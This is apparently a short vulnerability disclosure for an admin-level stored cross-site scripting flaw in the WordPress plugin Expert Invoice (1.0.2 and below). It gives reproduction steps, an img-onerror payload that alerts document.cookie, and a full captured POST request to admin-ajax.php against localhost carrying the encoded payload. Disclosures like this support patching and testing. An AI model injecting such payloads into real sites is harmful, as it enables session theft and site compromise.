Expert Invoice <= 1.0.2 -Admin+ Stored XSS

1. Navigate to Expert Invoice >> Customers >> Add Customer, and set the payload below as the name for this customer:
<img src=x onerror=alert(document.cookie) />
2. Click on "Ok"
3. You will observe that the payload was stored in the database, the JavaScript payload was executed successfully, and we got a pop-up.

---
PoC request:

POST /wordpress2/wp-admin/admin-ajax.php?action=expert_invoice_ajax_action&r=customer/create HTTP/1.1
Host: localhost
Content-Length: 97
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wordpress2/wp-admin/admin.php?page=expert-invoice-customer
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_26136172b2949242d677f08fc280dbe6=guido%7C1715212326%7Cjs91INKy3CE6z1tCQzESsKYWGq768fF5Hf46SBQ4gAc%7Cc13ef996618e006139d94e751ba34d101442ab956a33c2facdba17a698e4d411; manage_fields-tab=3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_26136172b2949242d677f08fc280dbe6=guido%7C1715212326%7Cjs91INKy3CE6z1tCQzESsKYWGq768fF5Hf46SBQ4gAc%7Ca050752cef05e1a3832ed50a33a2aa337bebc7814f858dcfb4883447acfe4597; tk_ai=woo%3Aj8lkEhzjhae%2BVJK9%2BGu7Hq9m; woocommerce_items_in_cart=1; woocommerce_cart_hash=063c652650410a476899fd4aff956a68; wp_woocommerce_session_26136172b2949242d677f08fc280dbe6=1%7C%7C1714524561%7C%7C1714520961%7C%7Cb87d2e08b2ed77e9b661f3fd7a457cc4; wp-settings-1=e9m120fbrn; wp-settings-time-1=1714362616; PHPSESSID=2vmvusoc212o1iiterrjt5png5; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-04-24%2003%3A26%3A31%7C%7C%7Cep%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2F%7C%7C%7Crf%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dchainedquiz_questions%26action%3Dedit%26id%3D2; sbjs_first_add=fd%3D2024-04-24%2003%3A26%3A31%7C%7C%7Cep%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2F%7C%7C%7Crf%3Dhttp%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dchainedquiz_questions%26action%3Dedit%26id%3D2; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29; selectedTab=settings; themify-builder-tabs=themify-popupt; sbjs_udata=vst%3D11%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F124.0.6367.60%20Safari%2F537.36
Connection: close

name=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)+%2F%3E&isActive=1&isTaxExempt=0&categoryId=1